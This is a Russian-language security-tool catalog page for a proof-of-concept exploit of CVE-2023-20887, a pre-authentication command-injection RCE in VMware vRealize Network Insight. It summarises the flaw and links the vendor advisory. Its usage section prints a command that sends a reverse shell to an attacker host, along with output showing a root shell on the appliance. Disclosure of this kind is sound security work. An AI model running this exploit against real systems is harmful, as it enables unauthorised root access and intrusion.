Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight — удалённое выполнение кода до аутентификации (CVE-2023-20887) | Kitploit
Инструменты/GitHubGitHub/sinsinology/cve-2023-20887
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubsinsinology/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight — удалённое выполнение кода до аутентификации (CVE-2023-20887)

Репозиторий
2294113 лет назадПроверено Kitploit
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-20887

POC для CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) неаутентифицированное RCE

Технический анализ

Анализ первопричины уязвимости можно найти в моём блоге: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

poc

Краткое описание

VMWare Aria Operations for Networks (vRealize Network Insight) подвержен внедрению команд при приёме пользовательского ввода через интерфейс Apache Thrift RPC. Эта уязвимость позволяет удалённому неаутентифицированному злоумышленнику выполнять произвольные команды в операционной системе под пользователем root. Интерфейс RPC защищён обратным прокси, который можно обойти. VMware оценила серьёзность этой проблемы как критическую с максимальной базовой оценкой CVSSv3 9.8. Злоумышленник может получить удалённое выполнение кода с правами 'root' на устройстве. Уязвимы версии VMware 6.x.

Использование

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

Меры по устранению

Обновитесь до последней версии или примите меры, следуя инструкциям в Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

Подписывайтесь на нас в Twitter для получения последних исследований в области безопасности:

  • SinSinology
  • SummoningTeam

Отказ от ответственности

Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных методов защиты и не предназначено для использования против систем, кроме случаев явного разрешения. Сопровождающие проект не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент